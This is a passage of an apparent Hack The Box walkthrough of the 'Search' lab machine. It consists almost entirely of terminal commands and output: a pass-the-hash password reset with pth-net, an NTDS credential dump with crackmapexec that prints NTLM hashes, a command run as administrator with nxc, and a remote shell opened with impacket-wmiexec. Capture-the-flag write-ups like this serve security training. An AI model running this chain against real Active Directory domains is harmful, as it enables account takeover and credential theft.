LDAPS  10.10.11.129   636  RESEARCH   Account: BIR-ADFS-GMSA$   NTLM: e1e9fd9e46d0d747e1595167eedcec0f

Change password of TRISTAN.DAVIES Account using net rpc tool

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ pth-net rpc password "TRISTAN.DAVIES" 'P@ssword123!' -U "search.htb"/"BIR-ADFS-GMSA$"%"ffffffffffffffffffffffffffffffff":"e1e9fd9e46d0d747e1595167eedcec0f" -S "$ip"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!' 

SMB   10.10.11.129   445  RESEARCH  [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!' --ntds

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)
SMB         10.10.11.129    445    RESEARCH         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.129    445    RESEARCH         Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c56xxxxxxxxxxxx:::
SMB         10.10.11.129    445    RESEARCH         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.129    445    RESEARCH         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
SMB         10.10.11.129    445    RESEARCH         search.htb\Santino.Benjamin:1194:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
<snip>

Get the flag with NetExec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc smb $ip -u administrator -H 5e3c0abbe0b4163c56xxxxxxxxxxxx -x 'type C:\Users\Administrator\Desktop\root.txt'

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\administrator:5e3c0abbe0b4xxxxxxxxxx163c56x (Pwn3d!)
SMB         10.10.11.129    445    RESEARCH         [+] Executed command via wmiexec
SMB         10.10.11.129    445    RESEARCH         b2f761828983df3ff185cdc96604225d

Or access the machine with wmiexec.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-wmiexec search.htb/administrator@$ip -hashes :5e3c0abbe0b4163c56xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator

Root Flag: b2f761828983df3ffxxxxxxxxxxxxx